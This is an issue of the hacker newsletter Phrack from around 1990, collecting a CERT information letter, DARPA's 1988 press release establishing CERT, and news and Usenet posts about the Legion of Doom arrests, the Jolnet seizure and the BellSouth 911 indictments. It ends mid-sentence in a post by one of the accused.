- Ahh.. What do you know about CERT? "Nothing" you say? Well, the
- following is the press release and other reprints of information about CERT.
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
-
- Richard Pethia <rdp@SEI.CMU.EDU>
- DEAR XXXXXXXXX,
- I have been reviewing our correspondence files and have discovered
- that your request for information may not have been filled. I
- apologize for the delay and hope that the information is still useful
- to you. If, after reading the following, you have additional
- questions or would like to subscribe to one of our information lists,
- please send email with your question/request.
- The Computer Emergency Response Team (CERT) was established by the Defense
- Advanced Research Projects Agency in November of 1988 to serve members
- of the Internet Research community. The press release below describes
- the general role of the CERT.
- More specifically, the CERT supports individual Internet sites by:
- -Working with site personnel to help resolve individual computer security
- incidents. Contact potentially affected sites to warn them of
- possible security breaches. Work with sites to change the
- conditions that allowed incidents to occur.
- -Issuing advisories that alert the community to specific system
- vulnerabilities or intrusion techniques, as well as the methods to
- protect against them.
- -Working with the community and system (primarily Unix) vendors to
- reslove specific system vulnerabilities.
- -Maintaining and operating moderated mailing lists that: (1) provide a
- discussion forum for tools and techniques to improve the security of
- Unix systems, and (2) provide a discussion forum and alert mechanism
- for PC viruses, trojan horses, etc.
- Over the past year we have developed hundreds of working relationships
- with members of the Internet and other communities and have
- established an extensive information collection and dissemination
- network. Because of this network of cooperating individuals and
- organizations, we are often able to advise the community of problems
- allowing them to take corrective action before being affeceted by
- those problems.
- ---------------------
- No. 597-88
- (202) 695-0192 (Info.)
- (202) 697-3189 (Copies)
- IMMEDIATE RELEASE December 6, 1988 (202) 697-5737
- (Public/Industry)
- DARPA ESTABLISHES COMPUTER EMERGENCY RESPONSE TEAM
- The Defense Advanced Research Projects Agency (DARPA) announced today
- that it has established a Computer Emergency Response Team (CERT) to
- address computer security concerns of research users of the Internet,
- which includes ARPANET. The Coordination Center for the CERT is
- located at the Software Engineering Institute (SEI), Carnegie Mellon
- University, Pittsburgh, PA.
- In providing direct service to the Internet community, the CERT will
- focus on the special needs of the research community and serve as a
- prototype for similar operations in other computer communities. The
- National Computer Security Center and the National Institute of
- Standards and Technology will have a leading role in coordinating the
- creation of these emergency response activities.
- The CERT is intended to respond to computer security threats such as
- the recent self-replicating computer program ("computer virus") that
- invaded many defense and research computers.
- The CERT will assist the research network communities in responding to
- emergency situations. It will have the capability to rapidly
- establish communications with experts working to solve the problems,
- with the affected computer users and with government authorities as
- appropriate. Specific responses will be taken in accordance with
- DARPA policies.
- It will also serve as a focal point for the research community for
- identification and repair of security vulnerabilities, informal
- assessment of existing systems in the research community, improvement
- to emergency response capability, and user security awareness. An
- important element of this function is the development of a network of
- key points of contact, including technical experts, site managers,
- government action officers, industry contacts, executive level
- decision-makers and investigative agencies, where appropriate.
- Because of the many network, computer, and systems architectures and
- their associated vulnerabilities, no single organization can be
- expected to maintain an in-house expertise to respond on its own to
- computer security threats, particularly those that arise in the
- research community. As with biological viruses, the solutions must
- come from an organized community response of experts. The role of the
- CERT Coordination Center at the SEI is to provide the supporting
- mechanisms and to coordinate the activities of experts in DARPA and
- associated communities.
- The SEI has close ties to the Department of Defense, to defense and
- commercial industry, and to the research community. These ties place
- the SEI in a unique position to provide coordination support to the
- software experts in research laboratories and in industry who will be
- responding in emergencies and to the communities of potentially
- affected users.
- The SEI is a federally-funded research and development center,
- operating under DARPA sponsorship with the Air Force Systems Command
- (Electronic Systems Division) serving as executive agent. Its goal is
- to accelerate the transition of software technology to defense
- systems. Computer security is primarily a software problem, and the
- presence of CERT at the SEI will enhance the technology transfer
- mission of the SEI in security-related areas.
- -END-
-
- QUESTIONS AND ANSWERS: DARPA ESTABLISHES CERT, 12/6/88
- Q: Can you provide background on earlier break-ins?
- A: On November 2, 1988, thousands of computers connected to
- unclassified DoD computer networks were attacked by a virus. Although
- the virus did not damage or compromise data, it did have the effect of
- denying service to thousands of computer users. The computer science
- research community associated with the Defense Advanced Research
- Projects Agency (DARPA), along with many other research laboratories
- and military sites that use these networks, quickly responded to this
- threat. They developed mechanisms to eliminate the infection, to
- block the spread of the self-replicating program, and to immunize
- against further attack by similar viruses. Software experts from the
- University of California at Berkeley, with important contributions
- from the Massachusetts Institute of Technology and other network
- sites, rapidly analyzed the virus and developed immunization
- techniques. These same software experts also provided important
- assistance in the more recent Internet intrusion of 27-28 November.
- As the events unfolded, DARPA established an ad hoc operation center
- to help coordinate the activities of software experts working around
- the clock and to provide information to appropriate government
- officials. The operations center had three main tasks. It
- facilitated communications among the many groups affected, it ensured
- that government organizations were promptly informed of developments,
- and it provided initial technical analysis in DoD. Although the
- threat was contained quickly, a more maliciously designed virus could
- have done serious damage.
- The recent events serve as a warning that our necessarily increasing
- reliance on computers and networks, while providing important new
- capabilities, also creates new kinds of vulnerabilities. The
- Department of Defense considers this an important national issue that
- is of major concern in both the defense and commercial sectors. The
- DoD is developing a technology and policy response that will help
- reduce risk and provide an emergency reaction response.
- Q: Who will be on the CERT?
- A: The CERT will be a team of over 100 experts located throughout the
- U.S. whose expertise and knowledge will be called upon when needed.
- When not being called upon, they will continue their normal daily
- work. As noted in the release, these experts will include: technical
- experts, site managers, government action officers, industry contacts,
- executive-level decision-makers and representatives from investigative
- agencies.
- recommendations that will be acted upon by DoD authorities.
- Q: Is the CERT fully operational now?
- A: We are in the very early stages of gathering people for the CERT.
- We are first concentrating on collecting technical experts. A staff
- is in place at SEI, but details are still being worked out.
- Q: Will there just be one CERT?
- A: The intent is that each major computer community may decide to
- establish its own CERT. Each CERT will therefore serve only a
- particular community and have a particular technical expertise. (The
- DARPA/SEI CERT will serve, for example, the research community and
- have expertise in Berkeley-derived UNIX systems and other systems as
- appropriate.) The National Computer Security Center and the National
- Institute of Standards and Technology will support the establishment
- of the CERTs and coordinate among them.
- Q: What are the special needs of the research community that their
- CERT will serve?
- A: The special challenge of the research community is improving the
- level of computer security without inhibiting the innovation of
- computer technology. In addition, as is often DARPA's role, their
- CERT will serve as a prototype to explore the CERT concept so that
- other groups can learn and establish their own.
- Q: Does the CERT Coordination Center have a press point of contact?
- A: No. Their function is to serve as a nerve center for the user
- community.
- .end
- _______________________________________________________________________________
- USA Today and the devil
- -----------------------
- Many controversies have been made of the article printed in USA Today
- after Operation Sun-Devil took it's toll.
- Phrack inc. tried to contact the author, and with no luck she wasn't
- accepting phone calls. Please remember, this is only a USA Today article --
- C'mon, get real USAT.
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
-
-
- byline 'Debbie Howlett, USA Today' reads:
- A network of computer hackers operating in 14 cities -- which bilked phone
- companies of $50 million -- has been unplugged, police say.
- "We're not talking about somebody who played Space Invaders too many
- times," says Tim Holtzen, spokesman for the U.S. attorney in Phoenix.
- The hackers -- the largest such ring discovered in the USA --broke into
- phone company and bank computer systems to obtain account numbers and run
- up an unknown total in debts, police say.
- "The main thing is the life-threatening information these computer hackers
- were trying to get into," says Richard Adams of the Secret Service. "It
- goes beyond being monetary to totally mischievous."
- The ring was uncovered 18 months ago, when members tried and failed to
- infiltrate computers at Barrows Neurological Institute in Phoenix.
- They later tried to block incoming calls to the 911 emergency service in
- Chicago. The motivation? "The primary reason is as kind of a malicious
- hobby." says Gary Chapman of Computer Professionals for Social
- Responsibility. "People are interested in testing their skills against
- security measures." But, Adams says, "I hate to minimize it by saying it
- was just for kicks."
- Police seized 40 computers and 23,000 disks during searches Tuesday in 14
- cities, officials said Wednesday. Five men, between the ages of 19 and 24,
- have been arrested.
- What's been uncovered so far, says Holtzen, may be "just the tip of the
- iceberg."
- [END OF STORY]
- _______________________________________________________________________________
-
- ==Phrack Inc.==
- Volume Three, Issue Thirty-one, Phile #10 of 10
- PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN
- PWN Phrack World News PWN
- PWN Issue XXXI, Part Three PWN
- PWN Compiled by Phreak_Accident PWN
- PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN
-
- Comp.dcom.telecom
- -----------------
- The following is excerpts from comp.dcom.telecom regard the now "Infamous"
- Legion Of Doom busts. I know most of you have seen some of these
- somewhere-sometime, but I thought I would try to get these out for those
- unfortunate souls that don't have Usenet access.
- I know there have been many controversies over the following material and
- the busts as a whole -- Henceforth, Phrack Inc. will not comment on any of such
- busts. Mainly because we don't want to jeopardize any current investigations
- concerning LOD and others. Leave it alone. It's old news. Let this sum it up
- for you guys and then forget about it.
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
-
- Newsgroups: comp.dcom.telecom
- Subject: CBS News Special Report - "The Busting of The Mentor"
- Message-ID: <4747@accuvax.nwu.edu>
- Date: 5 Mar 90 06:11:49 GMT
- Sender: news@accuvax.nwu.edu
- Organization: Capital Area Central Texas Unix Society, Austin, TX
- Lines: 37
- Approved: Telecom@eecs.nwu.edu
- X-Submissions-To: telecom@eecs.nwu.edu
- X-Administrivia-To: telecom-request@eecs.nwu.edu
- X-Telecom-Digest: Volume 10, Issue 145, Message 6 of 6
- ...I've just gotten a new update on the Mentor's recent apprehension by
- the Feds. Thought you might like to hear something as close to as direct
- from the Mentor as possible under the circumstances.
- From: Daneel Olivaw #96 @5283
- Date: Sun Mar 04 19:55:28 1990
- I'll have to play the Mentor for now (with permission granted).
- If you haven't heard the rumors, here is the truth.
- The Mentor was awakened at 6:30am on Thursday (3/1/90) with the gun of
- a Secret Service agent pointed at his head. The SS proceded to search
- and seize for the next 4 1/2 hours. Things taken include an AT with
- 80mb HD, HP LaserJet II, various documents, and other thing. They
- then proceded to raid his office at work, and sieze the computer and
- laser printer there. Lost in the shuffle was a complete novel (being
- written and due in 2 weeks), and various other things.
- Across town: Those of you who know Erik Bloodaxe, he was also
- awakened, and his house searched.
- Neither have been charged with anything, but they expect to at least
- be called as witnesses at the case of the Phrack Boys (Knight
- Lightning and Tarren King) in Chicago April 15.
- Apparently, they did a shoddy job, as they tagged a book that Mentor
- had borrowed from me (Quarterman's "The Matrix"), and then forgot to
- take it, oh well....
- It ain't lookin so lovely. Also the UT computer systes are under
- *VERY* close watch, as they were/are being hacked on by hackers around
- the world, including some in Australia, and England.
- OM
- From: cosell@bbn.com (Bernie Cosell)
- Newsgroups: comp.dcom.telecom
- Subject: Keeping Copies of Illegal Things (was Re: Jolnet, Again)
- Message-ID: <4725@accuvax.nwu.edu>
- Date: 4 Mar 90 04:36:50 GMT
- Sender: news@accuvax.nwu.edu
- Organization: TELECOM Digest
- Lines: 52
- Approved: Telecom@eecs.nwu.edu
- X-Submissions-To: telecom@eecs.nwu.edu
- X-Administrivia-To: telecom-request@eecs.nwu.edu
- X-Telecom-Digest: Volume 10, Issue 143, Message 3 of 8
- }TELECOM Digest Sat, 3 Mar 90 20:45:00 CST Special: Jolnet, Again
- This isn't misc.legal, and this isn't the time to be excessively picky
- and critical, but:
- }Here is how he told the tale of the '911 software':
- }The software showed up on his system one day, almost two years ago. It
- }came to him from netsys, where Len Rose was the sysadmin. According to
- }Andrews, when he saw this file, and realized what it was, he knew the
- }thing to do was to 'get it to the proper authorities as soon as
- }possible',...
- }ME> "After you passed it along to Boykin, did you then destroy the
- }file and get it off your site?"
- }RA> "Well, no... I kept a copy also."
- It strikes me that this is a KEY faux pas, regardless of good
- intentions or not.
- }But then, said Andrews, a funny thing happened several months later.
- }The folks at AT&T, instead of being grateful for the return of their
- }software came back to Andrews to (in his words) 'ask for it again.'
- }Somehow, they either never got it the first time; got it but suspected
- }there were still copies of it out; or were just plain confused.
- Just so, and if RA *supplied* another copy, I suspect they'd interpret
- that as pretty convincing evidence that it WAS further distributed,
- and with RA's knowledge. I know that they didn't actually contact him
- and ask/tell him to expunge all copies of the stuff, but his actions
- clearly demonstrated his knowledge of just what it was he was messing
- with, and I think they could easily show that he incurred an
- obligation to act prudently with it, or else [just guessing now] he
- could be liable to being an accessory after the fact.
- }So he was contacted by the feds about a year ago, and it was at that
- }point he decided it was in his best interest to cooperate with any
- }investigation going on.
- Perhaps his sudden cooperation was less out of pangs of conscience
- that it might have appeared... [not to besmirch his motives here,
- only to point out that a call from the FBI pointing out that while you
- may not have really DONE anything, your actions _could_ end up landing
- you in court with some serious potential badness going down (and none
- of this untested cheesiness about the the technicalities of bbs's and
- such... nice mainstream legal liability), could be pretty persuasive
- at converting a concerned, but out-of-the-loop, citizen into an active
- helper].
- /Bernie\
- From: dattier@chinet.chi.il.us (David Tamkin)
- Newsgroups: comp.dcom.telecom
- Subject: Seizures Spreading
- Message-ID: <4724@accuvax.nwu.edu>
- Date: 4 Mar 90 05:55:20 GMT
- Sender: news@accuvax.nwu.edu
- Organization: TELECOM Digest
- Lines: 15
- Approved: Telecom@eecs.nwu.edu
- X-Submissions-To: telecom@eecs.nwu.edu
- X-Administrivia-To: telecom-request@eecs.nwu.edu
- X-Telecom-Digest: Volume 10, Issue 143, Message 2 of 8
- News is that Illuminati BBS, a system run by a company named Steve
- Jackson Games somewhere in Texas, was also shut down and its equipment
- seized by the federal government because two suspected Legion of Doom
- members were among its users.
- [Moderator's Note: And I suspect the raids will continue during the
- next week or two. I wonder which sites will be next? Each place they
- raid, the local crackers point their fingers at each other like
- naughty children, and to make themselves seem like the good guys they
- say, "Have you talked to so-and-so yet?". Let's see now: netsys,
- jolnet, attctc, illuminati, (your name here?)... Apparently even
- getting rid of incriminating evidence won't work any longer, if
- someone upstream of you tattled. PT]
- From: mosley@peyote.cactus.org (Bob Mosley III)
- Newsgroups: comp.dcom.telecom
- Subject: Austin, TX BBS Shut Down From Joinet Bust Fallout
- Message-ID: <4723@accuvax.nwu.edu>
- Date: 4 Mar 90 17:22:26 GMT
- Sender: news@accuvax.nwu.edu
- Organization: Capital Area Central Texas Unix Society, Austin, TX
- Lines: 28
- Approved: Telecom@eecs.nwu.edu
- X-Submissions-To: telecom@eecs.nwu.edu
- X-Administrivia-To: telecom-request@eecs.nwu.edu
- X-Telecom-Digest: Volume 10, Issue 143, Message 1 of 8
- This hit most BBS's in the Austin area on Thursday. It's believed
- the bust came down Wednesday morning. In a nutshell, here's what
- happened:
- Wednesday morning, Feb. 28, the offices of Steve Jackson Games, inc.,
- were raided by FBI and Secret Service officials. The establishment was
- shit down, and all computer systems, including the Illuminati BBS,
- were confiscated.
- At that time, a 'retired' member of the LoD, who was identified as
- 'The Mentor' was arrested. The charges reportedly are related to the
- recent 911 bust that has shut down joinet and attatc (or whatever
- Killerused to be called). His home system was confiscated, complete
- with an entire collection of "Phrack" issues and related paraphanalia.
- As of this writing, the Mentor is reportedly out on bail, sans system
- and network connection. The Illuminati BBS is still down, although SJ
- Games is back in operation, and no charges have been filed against any
- of the employees other than The Mentor. The systems owned by SJ Games
- have not been returned as of this writing.
- Finally, rumors were trickling in early this morning (Saturday, 3/4)
- that two BBS's in Dallas, three in Houston, and one in San Antonio
- were busted by the same authorites in relation to the same case.
- [in light of the Mentor's posted defense of the LoD, I kinda thought
- you'd like to see this one! - OM]
- From: telecom@eecs.nwu.edu (TELECOM Moderator)
- Newsgroups: comp.dcom.telecom
- Subject: Jolnet, Again
- Message-ID: <4701@accuvax.nwu.edu>
- Date: 4 Mar 90 02:45:00 GMT
- Sender: news@accuvax.nwu.edu
- Organization: TELECOM Digest
- Lines: 350
- Approved: Telecom@eecs.nwu.edu
- X-Submissions-To: telecom@eecs.nwu.edu
- X-Administrivia-To: telecom-request@eecs.nwu.edu
- X-Telecom-Digest: Special: Jolnet, Again
- TELECOM Digest Sat, 3 Mar 90 20:45:00 CST Special: Jolnet, Again
- Today's Topics: Moderator: Patrick Townson
- Re: AT&T Sourcecode: Poison! (Chip Rosenthal)
- Jolnet Seizure (Mike Riddle)
- Article Regarding JOLNET/e911/LoD/Phrack (Ben Rooney)
- A Conversation With Rich Andrews (TELECOM Moderator)
- Killer/attctc Permanently Down (Charlie Boykin)
- ----------------------------------------------------------------------
- From: Chip Rosenthal <chip@chinacat.lonestar.org>
- Subject: Re: AT&T Sourcecode: Poison!
- Date: 3 Mar 90 00:00:00 GMT
- Organization: Unicom Systems Development, Austin (yay!)
- [Moderator's Note: Original date of 2/25 changed to prevent premature
- expiration. PT]
- You've got a lot of nerve, Patrick.
- telecom@eecs.nwu.edu (TELECOM Moderator) writes:
- >We're told by a deep-throat type that AT&T is on the war path about
- >their software [...] Like jolnet, netsys went down abruptly, with
- >*everything* confiscated [...] Now comes news that attcdc [sic], formerly
- >known as killer went off line in a hurry.....
- Yessir, after all your complaints about that about anonymous Legion of
- Doom message, this is a really crummy thing to post. Based upon
- unattributed conversations, you imply that Len Rose and Charlie Boykin
- were involved in wrongdoing which lead to the shutdown of their
- systems.
- I don't know Len personally, but have had uucp connections with him in
- the past. Charlie, on the other hand, I do know personally. He is
- very well regarded in the Dallas/Fort Worth area, and was voted "1989
- DFW Administrator of the Year" by the DFW lunch-bunch...errr....DFW
- Association of Unix System Administrators.
- You have cast some crummy aspersions towards these guys. Since I know
- them, I will wait for the facts to come in. Others who don't know
- them could very well jump to conclusions on the basis of this posting.
- Was this message really called for?
- Chip Rosenthal | Yes, you're a happy man and you're
- chip@chinacat.Lonestar.ORG | a lucky man, but are you a smart
- Unicom Systems Development, 512-482-8260 | man? -David Bromberg
- ------------------------------
- Date: Wed, 28 Feb 90 21:38:39 EST
- From: Mike Riddle <Mike.Riddle@p6.f666.n5010.z1.fidonet.org>
- Subject: Jolnet Seizure
- Reply-to: Mike.Riddle@p6.f666.n285.z1.fidonet.org
- Organization: DRBBS Technical BBS, Omaha, Ne. 402-896-3537
- Has anyone tried a novel legal approach to the case of equipment
- seizure as "evidence"? As I remember the Electronic Communications
- Privacy Act, it contains specific procedures for authorities to obtain
- copies/listings of data on a system (which system may have been used
- for illegal purposes, but whose operator is not at the moment
- charged). From this I think a creative attorney could construct an
- argument that the national policy was not to seize equipment, merely
- to obtain all the information contained therein. After all, it's the
- data that caused any harm.
- Also, the Federal Rules of Evidence, and most state rules, provide
- that computer generated copies are "originals" for evidentiary
- purposes.
- I hope that someone close enough to the scene can keep us informed
- about what is happening on this one.
- {standard disclaimer goes here--don't pay any attention to me!}
- --- Ybbat (DRBBS) 8.9 v. 3.07 r.1
- * Origin: [1:285/666.6@fidonet] The Inns of Court, Papillion, NE (285/666.6)
- --- Through FidoNet gateway node 1:16/390
- Mike.Riddle@p6.f666.n5010.z1.fidonet.org
- ------------------------------
- From: brooney@sirius.uvic.ca
- Date: 3 Mar 90 2:36 -0800
- Subject: Article Regarding JOLNET/e911/LoD/Phrack
- The following is an article I received five days ago which contains, to my
- knowledge, information as yet unpublished in comp.dcom.telecom regarding the
- ongoing JOLNET/e911/LoD discussion. It was printed in a weekly magazine
- with a publishing date of Feb. 27 but other than that I have no exact idea
- of when the events mentioned herein took place.
- - Ben Rooney
- MISSOURI STUDENT PLEADS INNOCENT TO 911 CHARGES
- [Knight Lightning], a 19-year-old University of Missouri student, has
- pleaded not guilty to federal allegations that he invaded the 911
- emergency phone network for 9 states.
- As reported earlier, he was indicted this month along with [The Prophet],
- 20, of Decatur, Ga. Both are charged with interstate
- transportation of stolen property, wire fraud, and violations of the
- federal Computer Fraud and Abuse Act of 1986.
- Prosecutors contend the two used computers to enter the 911 system of
- Atlanta's Bell South, then copied the program that controls and
- maintains the system. The stolen material later allegedly was
- published on a computer bulletin board system operating in the Chicago
- suburb of Lockport. Authorities contend Neidorf edited the data for
- an electronic publication known as "Phrack."
- According to Associated Press writer Sarah Nordgren, in a recent
- hearing on the case Assistant U.S. Attorney William Cook was granted a
- motion to prevent the 911 program from becoming part of the public
- record during the trial. U.S. District Judge Nicholas Bua set April
- 16 for a trial.
- The 911 system in question controls emergency calls to police, fire,
- ambulance and emergency services in cities in Alabama, Mississippi,
- Georgia, Tennessee, Kentucky, Louisiana, North Carolina, South
- Carolina and Florida.
- ---------------------------------------
- Article from "A Networker's Journal" by Charles Bowen.
- Info-Mat Magazine (Vol. 6, No. 2)
- [Moderator's Note: {Info-Mat Magazine}, by the way, is the excellent
- electronic journal distributed on many BBS machines throughout the
- United States who are fortunate enough to be accepted as part of the
- magazine's distribution network. I personally wish it was distributed
- on Usenet as well: it is well written and very informative. PT]
- ------------------------------
- Date: Sat, 3 Mar 90 19:34:54 CST
- From: TELECOM Moderator <telecom@eecs.nwu.edu>
- Subject: A Conversation With Rich Andrews
- After the first articles appeared here relating to the seizure of
- Jolnet, and the indictment of some people for their part in the theft
- of '911 software', I got various messages from other folks in
- response. Some were published, while others were just personal
- correspondence to me. One from Chip Rosenthal was held over, and is
- included in this special issue today.
- One writer, whose comments were attributed to 'Deep Throat' spent some
- time on two occassions on the phone, in a conference call between
- himself, David Tamkin and myself.
- What was lacking in the several messages which appeared over the past
- week were comments from Rich Andrews, system administrator of Jolnet.
- I got one note from someone in Canada who said Andrews wanted to speak
- with me, and giving a phone number where I could call Andrews at his
- place of employment.
- I put in a call there, with David Tamkin on the other line and had a
- long discussion with Andrews, who was aware of David being on the line
- with me. I asked Andrews if he had any sort of net access available
- to him at all -- even a terminal and modem, plus an account on some
- site which could forward his mail to telecom. You see, I thought, and
- still think it is extremely important to include Rich Andrews in any
- discussion here.
- He assured me he did have an account on a Chicago area machine, and
- that a reply would be forthcoming within hours. I had a second
- conversation with him the next morning, but without David on the line.
- He again told me he would have a response to the several articles
- written in the Digest ready and in the email 'very soon'. This was on
- Wednesday morning, and we estimated his message would be here sometime
- later in the day -- certainly by midnight or so, when I am typically
- working up an issue of the Digest.
- Midnight came and went with no message. None showed up Thursday or
- Friday. I deliberatly withheld saying anything further in the hopes
- his reply would be here to include at the same time. I guess at this
- point we have to go on without him.
- When David Tamkin and I talked to him the first time, on Tuesday
- evening this past week, the first thing Andrews said to us, after the
- usual opening greetings and chitchat was,
- "I've been cooperating with them for over a year now. I assume you
- know that."
- We asked him to define 'them'. His response was that 'them' was the
- United States Secret Service, and the Federal Bureau of Investigation.
- He said this without us even asking him if he was doing so.
- We asked him to tell us about the raid on his home early in February.
- He said the agents showed up that Saturday afternoon with a warrant,
- and took everything away as 'evidence' to be used in a criminal
- prosecution.
- ME> "If you have been working and cooperating with them for this long,
- why did they take your stuff?"
- RA> "They wanted to be sure it would be safe, and that nothing would be
- destroyed."
- ME> "But if you wanted to simply keep files safe, you could have taken
- Jolnet off line for a few weeks/months by unplugging the modems from
- the phone jacks, no? Then, plugged in a line when you wanted to call
- or have a trusted person call you."
- RA> "They thought it was better to take it all with them. It was mostly
- for appearance sake. They are not charging me with anything."
- ME> "Seems like a funny way to treat a cooperative citizen, at least
- one who is not in some deep mess himself."
- He admitted to us that several crackers had accounts on Jolnet, with
- his knowledge and consent, and that it was all part of the investigation
- going on ... the investigation he was cooperating in.
- Here is how he told the tale of the '911 software':
- The software showed up on his system one day, almost two years ago. It
- came to him from netsys, where Len Rose was the sysadmin. According to
- Andrews, when he saw this file, and realized what it was, he knew the
- thing to do was to 'get it to the proper authorities as soon as
- possible', so he chose to do that by transferring it to the machine
- then known as killer, a/k/a attctc, where Charlie Boykin was the
- sysadmin.
- Andrews said he sent it to Boykin with a request that Boykin pass it
- along to the proper people at AT&T.
- ME> "After you passed it along to Boykin, did you then destroy the
- file and get it off your site?"
- RA> "Well, no... I kept a copy also."
- ME> "Did Charlie Boykin pass it along to AT&T as you had requested?"
- RA> "I assume he did."
- But then, said Andrews, a funny thing happened several months later.
- The folks at AT&T, instead of being grateful for the return of their
- software came back to Andrews to (in his words) 'ask for it again.'
- Somehow, they either never got it the first time; got it but suspected
- there were still copies of it out; or were just plain confused.
- So he was contacted by the feds about a year ago, and it was at that
- point he decided it was in his best interest to cooperate with any
- investigation going on.
- Andrews pointed out that the '911 software' was really just ".... a
- small part of what this is all about..." He said there was other
- proprietary information going around that should not be circulating.
- He said also the feds were particularly concerned by the large number
- of break-ins on computers which had occurred in the past year or so.
- He said there have been literally "....thousands of attempts to break
- into sites in the past year....", and part of his cooperation with the
- authorities at this time dealt with information on that part of it.
- We asked him about killer/attctc:
- ME> "You knew of course that killer went off line very abruptly about
- a week ago. What caused that? It happened a week or so after the feds
- raided you that Saturday."
- RA> "Well the official reason given by AT&T was lack of funds, but you
- know how that goes...."
- Now you'd think, wouldn't you, that if it was a funding problem -- if
- you can imagine AT&T not having the loose change in its corporate
- pocket it took to provide electrical power and phone lines to attctc
- (Charlie got no salary for running it) -- that at least an orderly
- transition would have taken place; i.e. an announcement to the net; an
- opportunity to distribute new maps for mail and news distribution,
- etc; and some forthcoming shut down date -- let's say March 1, or
- April 1, or the end of the fiscal year, or something....
- But oh, no... crash boom, one day it is up, the next day it is gone.
- ME> "What do you know about the temporary suspension of killer some
- time ago? What was that all about?"
- RA> "It was a security thing. AT&T Security was investigating Charlie
- and some of the users then."
- Andrews referred to the previous shutdown of killer as 'a real blunder
- by AT&T', but it is unclear to me why he feels that way.
- We concluded our conversation by Andrews noting that "there is a lot
- happening out there right now."
- He said the [Phrack] magazine distribution, via netsys, attctc and
- jolnet was under close review. "One way to get them (crackers) is by
- shutting down the sites they use to distribute stuff..."
- And now, dear reader, you know everything I know on the subject. Well,
- almost everything, anyway....
- From other sources we know that Len Rose of netsys was in deep
- trouble with the law *before* this latest scandal. How deep? Like he
- was ready to leave the country and go to the other side of the world
- maybe? Like he was in his car driving on the expressway when they
- pulled him over, stopped the car and placed him under arrest? Deep
- enough? This latest thing simply compounded his legal problems.
- Patrick Townson
- ------------------------------
- Date: Fri Mar 2 06:59:23 1990
- From: Charlie Boykin <cfb@sulaco.sigma.com>
- Subject: Killer/attctc Is Permanently Down
- Hello,
- Regarding a couple of things as well as a message from Bill Huttig.
- The system WAS shut down a couple of years ago - for three weeks -
- as part of a security inquiry. It has been in continous operation
- since. On July 4, 1989, it was moved to a Customer Demonstration
- location at the Dallas Infomart and the node name changed to attctc
- (for AT&T Customer Technology Center). The system was closed down on
- February 20, 1990 after 5 years of operation. There are no charges
- pending and the "management" of the system have been ostensibly
- cleared of any illegal activities.
- As of now, there are no intentions of returning the system to
- service. There are hopeful plans and proposals that could conceivably
- result in the system being placed back in service in a different
- environment and under different management.
- Respectfully,
- Charles F. Boykin
- Formerly sysop\@attctc (killer)
- ------------------------------
- End of TELECOM Digest Special: Jolnet, Again
- ******************************
- ---------------
- [reprinted without permission from the Feb. 12th, 1990 issue of Telephony]
- ALLEGED HACKERS CHARGED WITH THEFT OF 911 DATA
- Dawn Bushaus, Assistant Editor
- Four alleged computer hackers were indicted last week on charges that they
- schemed to steal and publish proprietary BellSouth Corp. emergency data. The
- alleged activity could have produced disruptions in 911 networks nationwide,
- according to federal officials.
- The case could raise new concerns about the security of local exchange
- carriers' internal computer networks, which house data records on customers,
- equipment and operations.
- "Security has always been a concern for the telephone companies," said
- Peter Bernstein, an analyst with Probe Research. "If you can crack the 911
- system, what does that say about the operational support system or the billing
- system?"
- A federal grand jury in Chicago handed down two indictments charging
- [The Prophet], 20, of Decatur, Ga., and [Knight Lightning], 19, of
- Chesterfield, Mo., with wire fraud, violations of the 1986 Computer Fraud Act
- and interstate transportation of stolen property.
- Facing similar criminal charges in Atlanta are [The Urvile], 22, and
- [The Leftist], 23.
- The four, alleged to be part of a closely knit group of hackers calling
- themselves the Legion of Doom, reportedly participated in a scheme to steal the
- BellSouth 911 data, valued at $80,000, and publish it in a hacker magazine
- known as "Phrack."
- The Legion of Doom reportedly is known for entering telephone companies'
- central office switches to reroute calls, stealing computer data and giving
- information about accessing computers to fellow hackers.
- According to the Chicago indictment, XXXXX, also known as "The Prophet,"
- stole a copy of the BellSouth 911 program by using a computer outside the
- company to tap into the BellSouth computer. Riggs then allegedly transferred
- the data to a computer bulletin board in Lockport, Ill.
- XXXXXXX, also known as "Knight Lightning," reportedly downloaded the
- information into his computer at the University of Missouri, Columbia, where he
- edited it for publication in the hacker magazine, the indictment said.
- The indictment also charges that the hackers disclosed the stolen
- information about the operation of the enhanced 911 system to other hackers so
- that they could illegally access the system and potentially disrupt or halt
- other systems across the country.
- The indictments followed a year-long investigation, according to U.S.
- Attorney Ira Raphaelson. If convicted, the alleged hackers face 31 to 32 years
- in prison and $122,000 in fines.
- A BellSouth spokesman said the company's security system discovered the
- intrusion, which occurred about a year ago, and the company then notified
- federal authorities.
- Hacker invasion in the BellSouth network is very rare, the spokesman said,
- adding that the company favors "stringent laws on the matter."
- The indictment solicited concern about the vulnerability of the public
- network to computer hacking.
- ----------------
- From: MM02885@swtexas.bitnet
- Newsgroups: comp.dcom.telecom
- Subject: Re: Hacker Group Accused of Scheme Against BellSouth
- Message-ID: <4153@accuvax.nwu.edu>
- Date: 20 Feb 90 11:16:00 GMT
- Sender: news@accuvax.nwu.edu
- Organization: TELECOM Digest
- Lines: 95
- Approved: Telecom@eecs.nwu.edu
- X-Submissions-To: telecom@eecs.nwu.edu
- X-Administrivia-To: telecom-request@eecs.nwu.edu
- X-Telecom-Digest: Volume 10, Issue 118, message 3 of 6
- <<< SYS$ANCILLARY:[NOTES$LIBRARY]GENERAL.NOTE;1 >>>
- -< General Discussion >-
- ==============================================================================
- Note 155.6 the MENTOR of the tree tops 6 of 6
- SWT::RR02026 "Ray Renteria [ F L A T L I N E ] " 89 lines 20-FEB-1990 00:18
- -< Life, The Universe, & LOD >-
- To set the record straight, a member of LOD who is a student in Austin
- and who has had his computer account at UT subpoenaed by the DA out of
- Chicago because of dealings with the above happenings:
- My name is Chris, but to the computer world, I am Erik Bloodaxe. I
- have been a member of the group known as Legion of Doom since its
- creation, and admittedly I have not been the most legitimate computer
- user around, but when people start hinting at my supposed
- Communist-backed actions, and say that I am involved in a world-wide
- consipracy to destroy the nations computer and/or 911 network, I have
- to speak up and hope that people will take what I have to say
- seriously.
- Frank, Rob and Adam were all definately into really hairy systems.
- They had basically total control of a packet-switched network owned by
- Southern Bell (SBDN)...through this network they had access to every
